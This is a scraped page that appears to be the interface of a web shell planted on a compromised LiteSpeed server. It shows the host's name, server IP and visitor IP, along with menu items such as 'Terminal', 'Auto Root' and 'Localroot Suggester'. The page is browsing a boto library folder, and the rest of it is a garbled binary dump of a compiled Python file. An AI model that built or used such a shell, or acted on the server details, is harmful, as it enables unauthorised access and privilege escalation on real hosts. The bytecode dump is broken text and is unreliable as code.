Linux ams-business-5.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 23.254.231.17 & Your IP : 216.73.217.85
Domains :
Cant Read [ /etc/named.conf ]
User : uxvsuhne
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python2.7 /
site-packages /
boto /
Delete
Unzip
Name
Size
Permission
Date
Action
gs
[ DIR ]
drwxr-xr-x
2024-02-09 23:57
vendored
[ DIR ]
drwxr-xr-x
2021-10-01 08:10
endpoints.py
9.52
KB
-rw-r--r--
2021-10-01 08:10
endpoints.pyc
9.01
KB
-rw-r--r--
2021-10-01 08:10
Save
Rename
� }�Vac @ s^ d d l j j j Z d e j f d � � YZ d e f d � � YZ d e f d � � YZ d S( i����Nt _CompatEndpointResolverc B s� e Z d Z i d d 6d d 6d d 6d d 6d d 6Z d d � Z d e d � Z d � Z d d � Z d � Z d d � Z d � Z d � Z d � Z RS( sy Endpoint resolver which handles boto2 compatibility concerns. This is NOT intended for external use whatsoever. t lambdat awslambdat monitoringt cloudwatcht emailt sest ecst ec2containerservicet configt configservicec C sZ t t | � j | � | d k r. | j } n | | _ t d � | j � D� � | _ d S( s. :type endpoint_data: dict :param endpoint_data: Regions and endpoints data in the same format as is used by botocore / boto3. :type service_rename_map: dict :param service_rename_map: A mapping of boto2 service name to endpoint prefix. c s s! | ] \ } } | | f Vq d S( N( ( t .0t kt v( ( s2 /usr/lib/python2.7/site-packages/boto/endpoints.pys <genexpr>3 s N( t superR t __init__t Nonet _DEFAULT_SERVICE_RENAMESt _endpoint_prefix_mapt dictt itemst _service_name_map( t selft endpoint_datat service_rename_map( ( s2 /usr/lib/python2.7/site-packages/boto/endpoints.pyR "